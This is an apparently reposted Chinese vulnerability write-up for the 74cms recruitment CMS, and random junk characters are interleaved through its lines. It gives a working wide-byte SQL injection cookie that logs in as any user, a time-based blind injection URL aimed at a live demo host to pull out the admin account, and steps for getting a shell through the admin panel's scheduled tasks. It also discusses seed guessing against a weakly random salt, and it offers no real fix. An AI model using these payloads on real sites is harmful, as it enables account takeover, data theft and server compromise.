0x1 任意用户登录- \$ F* r4 {4 ]5 \, L& W4 \
( ^5 V( B D# v8 Z 0x2 盲注
: c- V* c" R2 Z) @$ G8 {" G1 R" @, h A2 b$ X9 |% ?' c
0x3 后台拿shell
" r; ?; q9 ~3 p. ^$ x* v( L |2 r2 J0 w' ]+ S4 r( u& q( e) R: k
0x4 随机函数问题
' ]5 F! P N' [7 ~4 _6 n0 I, ~5 G2 K8 {" E2 n6 e
详细说明:
3 n5 r( [+ m4 R2 r1 }
8 J* V6 P ^8 }# V 0x1 任意用户登录
# [% \. y' Y) _9 R: k9 } s, u$ s
user/login.php
/ p7 ]5 @ V& p" P
9 k; L4 l5 G/ `8 T$ h0 w: r elseif((empty($_SESSION['uid']) || empty($_SESSION['username']) || empty($_SESSION['utype'])) && $_COOKIE['QS']['username'] && $_COOKIE['QS']['password'] && $_COOKIE['QS']['uid'])
* H2 b& E8 `- e* q! @; u& C' S! }: d4 q. {
{
4 m; _* k) z+ C5 D
5 j' G1 O" [+ B& B if(check_cookie($_COOKIE['QS']['username'],$_COOKIE['QS']['password']))+ K. f0 g9 j6 h2 `6 \% W' h& o
" g& t: _. W2 }0 J+ w {, ?0 Z) ?8 h3 g
, e- `. D! c6 c8 l. m update_user_info($_COOKIE['QS']['uid'],false,false);$ x9 N5 F0 E2 _, n3 ]4 O
# w6 S4 j+ y5 C1 k) I- U& Y2 G header("Location:".get_member_url($_SESSION['utype']));
' h3 o, k$ C3 L \ n' N" X5 }- q ^) t7 B9 }# o. C
}
& O( i5 u' q2 C& D# \; D& y$ o
else3 v/ I# Z4 z1 z* z7 E
% b7 j: P- @1 k/ W# Q; z {
( Z- f0 d% x2 d: w$ Q1 b5 z$ P# J! t k- M6 e9 N! c$ Q
unset($_SESSION['uid'],$_SESSION['username'],$_SESSION['utype'],$_SESSION['uqqid'],$_SESSION['activate_username'],$_SESSION['activate_email'],$_SESSION["openid"]);8 Q5 `* s/ C D0 E
( M) s( R+ C- C/ r! h setcookie("QS[uid]","",time() - 3600,$QS_cookiepath, $QS_cookiedomain);$ m( h" l3 l) _' H1 \$ R) E
5 p& W) _ a4 W" } setcookie('QS[username]',"", time() - 3600,$QS_cookiepath, $QS_cookiedomain);* F5 q3 |. \5 J
, U8 o- M' s0 [/ J0 W setcookie('QS[password]',"", time() - 3600,$QS_cookiepath, $QS_cookiedomain);
0 E ~" P) W# Z
4 U2 @5 {$ R |- C+ J setcookie("QS[utype]","",time() - 3600,$QS_cookiepath, $QS_cookiedomain);4 `; E4 U' `. U4 f+ E5 x2 Z3 L
4 b% x8 ?5 i. A+ { Z' W header("Location:".url_rewrite('QS_login'));1 N7 \$ r: s8 q( N! r$ Z" W/ e" U
7 {3 P1 X( W. Q, k7 e1 Q
}
2 Y% T+ C1 w. C8 R1 Q8 {! t0 I8 b) [4 J% i* G
}
r7 L4 i8 D$ h! `' z2 l6 l* o& w4 w; H1 y1 S8 Y2 ~4 H( u4 s, Z
include/fun_user.php
7 k9 Q; y; D' `: m
- O6 l# M) n- B( {5 R8 z //检测COOKIE
. @, {: c/ [: S8 B" ]- B' e% I$ U9 ?$ _4 K: j
function check_cookie($name,$pwd){8 X4 J7 V4 ?; ]( p# r/ C R: p
, H* w% N- o+ t$ I% m! C6 K global $db;: j1 }; u. h' G. G4 [# v' T* |- Z
9 `& ^7 O0 ^1 {1 C2 A $row = $db->getone("SELECT COUNT(*) AS num FROM ".table('members')." WHERE username='{$name}' and password = '{$pwd}'");1 f! o& m* @% x/ y3 c
( E4 Z6 j- j: p9 X, F$ w
if($row['num'] > 0)1 Q$ B* c$ c& _3 ~% @# T
; M" x* @4 S. l# Q m& I2 f
{9 u [1 t: c% P7 \
& d1 ?( X {; T7 |. x- [& X+ v; E return true;- ]! @0 H7 {. H, K3 Z( {
& J' e- n. Z% r8 H
}else{
" f1 v+ h" i+ n6 p4 O$ ]! ~
9 [% h# e; M+ v3 ^3 t( u return false;/ S; @) X# Q# G2 L; U6 ?
$ ~1 Y, T4 e: F8 u; ` c: o
}
- N3 \0 ^: ?) n% c i8 |9 u, I4 b7 p$ V7 E
}! d0 ^% x$ ^8 e7 I& H- L. g, x1 I
7 \, u5 p5 Q- ?3 o 构造cookie如下, Q$ k1 e' K9 [0 {+ r
0 w* u9 s% E5 f. a
QS[uid] 2& k3 b, c! t% i6 D& G4 \+ c/ b. W
( t1 ?5 A; M C6 a+ H
QS[utype] 14 \9 F% X. f/ i+ i' L# s W! b
; @/ g0 c; Y. A/ F
QS[password] 111111111111111111111
: _# u+ N* U2 g. P% m2 ]& R# a1 i9 }2 i7 c8 T# P# x" k
QS[username]%bf%27 or 1=1 %236 s( X$ S5 m6 T) ^, [
* u9 \' g3 l; f2 h uid 为假冒用户的ID utype为用户类型password任意
+ J# o' U) ]" C' z; ^$ O
7 E9 I+ P2 n; I; W; ] 0x2 盲注5 n- R2 _7 r) U3 y$ d- [
; x& U3 g: H6 C: Y8 G! v* j2 p0 T http://demo32.74cms.com//resume/resume-list.php?key=test00%bf')/**/and+if((select/**/admin_name/**/from/**/qs_admin/**/limit/**/0,1)=0x61646D696E,benchmark(1000000000,(select/**/1)),1)/**/%23
/ Z ]$ {- n9 _1 N' ^0 k* g6 L- l0 ^% @
上面两个都是宽字节注入,如果你能猜出管理员密码,还能解出双重md5的话,还能猜出后台路径,继续看下面1 W9 s5 o% ? }1 _2 ]! e1 l, R! j
) V/ x6 f4 z Z$ w3 r" q 0x3 后台拿shell
* \$ I! G( X$ i0 V) F8 C4 { A' F1 g* B S% S
1.先关闭csrf防御功能
2 V: D+ _- g# L& w( K0 ?$ d7 T; ~; V- e$ T( L4 R
2.在hr工具箱中添加一个伪造的doc,内容为,记下路径data/hrtools/2012/06/1339941553308.doc. a" O r7 `& y2 L, p/ I: x
3 r4 ~" U) ]$ b \* C; ?* C
3.在工具-计划任务中添加任务,脚本任务填../../data/hrtools/2012/06/1339941553308.doc3 U. p8 Z- `* `3 X& F7 E K x" J
& m7 J. s/ x4 X; Z0 n. |' I
4.然后执行# ^+ A1 j- q; T2 U. s& V- G) `
: m* a4 Y" I& y2 O7 s' W& \ 0x4 随机函数问题(几乎可以无视,纯属个人YY)+ F$ P* w& U- J; q6 \# p; @
+ V: R$ f2 c. n7 b U6 v4 }
在admin_common.fun.inc.php中有个$QS_pwdhash是在安装的时候赋值的,只要能猜出就可已不用解双重md5了。
' c- R5 V( i$ |' J9 X9 H L$ E# a2 b6 C
这个$QS_pwdhash是由randstr生成
* q6 i! E1 q9 P# W* u- f- q$ `" Z- R! c2 y4 s
function randstr($length=6)$ V% }8 S2 X+ m: D: R
$ n6 T$ @4 Y( R0 u
{; J Q* T- \' y+ `2 R; s2 `
+ P6 t) U' K# V9 B
$hash='';
5 E k) t& w1 ~
?7 G' W X* e- o" q, d& t $chars= 'ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789abcdefghijklmnopqrstuvwxyz@#!~?:-=';
0 L& G- e. [$ F! ^1 _9 `$ n3 P5 {3 `% C0 ?
$max=strlen($chars)-1;. \" W0 t' Z' k8 e" i
' y/ a. Q4 B6 Q3 L( a6 {) ~1 } mt_srand((double)microtime()*1000000);
: n' L: M" f* ]4 S" `8 u5 v4 O" O% \3 x2 Z3 T7 h6 W( A! {
for($i=0;$i<$length;$i++) {/ N. ~7 P2 M! S5 B k V" ^
6 y; v# x) L0 E& x Y$ ~! k( R
$hash.=$chars[mt_rand(0,$max)];
+ L( M4 c- @# ^, f4 k# _7 c6 `2 Y, `7 Y2 m9 {; I" J
}6 e6 }' J, n& J- |0 Q6 }/ I
T8 ^3 S( @* h7 I: p% l
return $hash;4 A; j; g: S3 \
. s: T% d+ m: O; B
}
- `$ q# c- E8 x& y
* S+ ~$ T6 B# i: L) R7 J j 生成长度为6的随机数,mt_srand()播种一样,就会得到一样的随机数,所以我们最多要猜1000000次就可以了(蛋疼)
& S# e1 d/ {0 M+ |# v1 O$ e2 s
' w: O; U8 L: B 漏洞证明:
' r# H" _8 ~4 F8 I( C$ e8 K
3 z* {' H+ T: R) M% q 修复方案:
; L7 e" G! _0 ~0 \9 a% Q+ v: p7 Y# n9 m
do it yourself~# y( f( J& P# H. i' M
+ j- F' L1 x$ p3 k% ~
解决一切网站安全,湖盟云防火墙:hnhack.com |
